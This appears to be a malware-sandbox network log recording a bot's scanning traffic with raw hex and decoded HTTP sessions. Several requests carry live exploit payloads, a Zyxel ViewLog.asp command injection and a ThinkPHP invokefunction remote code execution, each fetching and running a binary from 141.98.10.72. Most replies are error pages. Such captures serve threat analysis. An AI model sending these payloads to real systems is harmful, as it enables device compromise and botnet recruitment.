                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            626192.168.2.233460095.86.125.2378080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:21.079914093 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            627192.168.2.234277888.19.69.14680
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:21.153084040 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:21.379987001 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:29:21 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            628192.168.2.235508295.160.104.1988080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:23.612739086 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            629192.168.2.2334494112.124.65.22580
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:23.725554943 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:24.100544930 CET978INHTTP/1.1 505
                                                            Content-Type: text/html;charset=utf-8
                                                            Content-Language: en
                                                            Content-Length: 830
                                                            Date: Wed, 14 Feb 2024 08:29:23 GMT
                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 35 30 35 20 e2 80 93 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 4e 6f 74 20 53 75 70 70 6f 72 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 68 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 62 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 61 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 35 30 35 20 e2 80 93 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 4e 6f 74 20 53 75 70 70 6f 72 74 65 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 505 HTTP Version Not Supported</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 505 HTTP Version Not Supported</h1></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            630192.168.2.234040695.100.176.5380
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:23.927208900 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:24.130168915 CET480INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 258
                                                            Expires: Wed, 14 Feb 2024 08:29:24 GMT
                                                            Date: Wed, 14 Feb 2024 08:29:24 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 37 31 66 31 36 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 33 36 34 26 23 34 36 3b 31 31 38 66 36 63 61 35 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;b71f1602&#46;1707899364&#46;118f6ca5</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            631192.168.2.234572895.100.55.13180
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:23.932933092 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:24.140531063 CET480INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 258
                                                            Expires: Wed, 14 Feb 2024 08:29:24 GMT
                                                            Date: Wed, 14 Feb 2024 08:29:24 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 65 31 36 31 35 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 33 36 34 26 23 34 36 3b 31 36 34 63 63 31 66 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;1e161502&#46;1707899364&#46;164cc1f3</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            632192.168.2.234913295.217.19.1980
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:23.945969105 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:24.166548014 CET321INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.25.3
                                                            Date: Wed, 14 Feb 2024 08:29:24 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 157
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.25.3</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            633192.168.2.235092495.143.177.13480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:23.953654051 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:24.181945086 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:29:24 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            634192.168.2.234108695.38.51.6580
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:24.030715942 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:24.336869955 CET242INHTTP/1.0 400 Bad Request
                                                            Connection: close
                                                            Content-Length: 113
                                                            Date: Sat, 10 Jul 1971 14:49:22 GMT
                                                            Expires: 0
                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <html><head><title>Error 400: Bad Request</title></head><body><h1>Error 400: Bad Request</h1></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            635192.168.2.234159494.30.61.478080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:24.048603058 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:24.249464989 CET944INHTTP/1.1 404
                                                            Content-Type: text/html;charset=utf-8
                                                            Content-Language: en
                                                            Content-Length: 796
                                                            Date: Wed, 14 Feb 2024 08:29:21 GMT
                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 68 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 62 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 61 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 